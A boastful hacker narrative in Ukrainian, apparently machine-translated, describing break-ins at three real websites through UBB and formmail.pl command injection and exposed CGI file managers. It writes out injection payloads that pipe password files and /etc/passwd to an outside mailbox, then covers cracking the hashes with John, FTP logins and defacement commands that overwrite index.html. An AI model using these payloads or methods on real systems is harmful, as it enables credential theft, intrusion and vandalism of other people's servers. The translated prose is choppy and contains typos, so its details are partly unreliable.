Все почалося з того, що сиділи ми в IRC — я, Ozzman і [email protected] Sun. Час був пізній і я вирішив йти спати, але раптом [email protected] каже, типу, гляньте сюди http://www.kungfuklan.com. Я вирішив подивитися і потрапив на сторінку якийсь то Корейської, то Китайської крэкерской групи. Ну так полазив, озирнувся, зайшов на форум, подивився релізи, загалом мені сподобалося, і дизайн класний :). Раптом мені як 2-е чуство говорить перевірити папку CGI-BIN на доступність. Ну я вводжу www.kungfuklan.com/cgi-bin/, і що ви думаєте ?:) Правильно! На цій папці був відкритий доступ і можна подивитися всі скрипти :). Якраз за пару днів до цього на сайті групи DAMNED я прочитав про свіжо знайденої дірці в Ultimate Bulletin Board, дана дошка і стояла біля наших самураїв :). Ozzman так само примітив це й не довго думаючи зберіг Sourse форми де був Replay і дописав в поле topic наступні:

topic=’012345.ubb|mail [email protected]

Але на жаль паролі були в Shadow :(. Ми не стали засмучуватися і змінивши рядок на наступну:

topic=’012345.ubb|cat Members/*|mail [email protected]|’

отримали паролі у відкритому вигляді на всю дошку! Але дошки мало :). Почали досліджувати далі і одразу натрапили на дирукторию _private і файл .htpasswd. Якщо хто не знає — тут зазвичай лежать хеши паролів у FrontPage. Так само і в директорії _private лежить файл services.pwd і теж з паролями:). Поставивши john’а перебирати паролі ми вирушили далі по директоріях. Не знайшовши в загальному-то нічого корисного пішли спати. Після 3-х днів, [email protected] нарешті розшифрував паролі але вони були від FrontPage :(, один з паролів був kickMe :), ми вирішили спробувати його по FTP і ура, ура, ура, пароль підійшов і сервер в наших руках! Ось до чого призводить недбалість Адмін (мабуть полінувався придумати інший пароль для FTP, або забути його побоявся :)). Прохання до всіх, якщо пароль ще не поміняли або не залатали дірку, не наносити ніякої шкоди даного сервера.

Ось так був зламаний сайт клану Kungfu :). Спасибі групі DAMNED, за так сказати вчасно викладену інформацію.

www.w-three.net
У способі злому цього сайту немає нічого нового і оригінального. Це скоріше приклад для ледачих адміністраторів і початківців script kiddie, ніж корисна інформація для мало – мальськи знає хакера. Загалом дірка полягала в присутності на сайті скрипта formmail.pl by Matt Wright версії 1.0 містить уразливість дозволяє виконувати команди shell. Про цю уразливість можна прочитати в cgi-bug на qwerty.nanko.ru, але я сам спробую описати принцип дії: для відправки пошти скрипт використовує наступний рядок:

open (MAIL, “|$mailprog $FORM{‘recipient’}”)
де $FORM{‘recipient’} поле recipient із зухвалого html і $mailprog=’/bin/sendmail’. знак “|” означає виконання команди shell. тобто замінивши на виконається команду:

“/bin/sendmail; cat /etc/passwd | mail [email protected]”

яка відправить файл з паролями на [email protected] Ось в принципі і все що потрібно знати для використання даної уразливості. Тепер повернемося до злому www.w-three.net. Мені пощастило. Отримавши пароль я побачив там hash’и паролів, а не “*” як при використанні shadow. Так як для даного сайту мене цікавив тільки deface і мені потрібен був доступ для скачування файлів, то я вибрав всіх користувачів, у яких був доступ на ftp і нагодував їх у св. Він одразу знайшов пароль для користувача gast — допомогла буржуйська звичка ставити login=passwd. У зломі допомогло мені і те обставина, що скрипт належав і виконувався з правами користувача має найвищий доступ в системі(якщо не брати в розрахунок root’а). Я міг читати, змінювати і створювати будь-які файли, які належали цьому користувачеві, а це були майже всі файли. Ну що ж, я маю всі можливості для deface: доступ для завантаження свого html і права на перезапис index.html лежачого на сайті. чим я і скористався:

mv
/usr/local/etc/httpd/htdocs/index.thml /usr/local/etc/httpd/htdocs/index1.html cp
/usr/local/etc/httpd/htdocs/gast/my.html /usr/local/etc/httpd/htdocs/index.html

Ось так «погані» паролі, не правильний розподіл прав і не оновлені скрипти можуть сприяти захопленню сайту.

sinobord.hypermart.net
Все почалося з того, що Lynx розповів(а) мені про commander.pl (дає можливість виконання команд як на shell кому цікаво сходіть і почитайте на www.hack-crack.com )і я став шукати сайти з цим скриптом і знайшов. Цим був сайтом sinoboard.hypermart.net (хост www.hypermart.net), як не дивно там виводився лістинг директорій. На деякі каталоги стояв пароль (я б сказав на все в яких могло бути щось цікаве).

Використання commander’a дало не багато файл паролів, який лежав в /etc був, як я зрозумів від www.hypermart.net, але там мене чекало розчарування всі паролі в * хе-хе (прикро розумієш), а master.пароль не був доступний. Але я не став розчаровуватися і почав досліджувати всі каталоги, на які був доступ без пароля. Багато чого там було і чат, дошка оголошень, і всяка інша всячина.
Так – же там був і скрипт fileman.cgi по суті це файловий менеджер. На запуск цього скрипта пароль не стояв. Я став дивитися вміст каталогів через нього, і яка ж радість він не вимагав пароля при відкритті каталогів на що стояв пароль. Пройшовшись по каталогах ще раз я знайшов те що мені було потрібно, файлик service.pwd в _vti_pvt. До речі цей менеджер давав можливість редагувати файли так що я міг відразу записати нову запис в цей файл (напевно), але для початку я поставив файл на рассшифровку (там була всього одна обліковий запис), і буквально через дві хвилини у мене на руках був пароль, він складався з 4 цифр Для перевірки зайшов по ftp все працювало.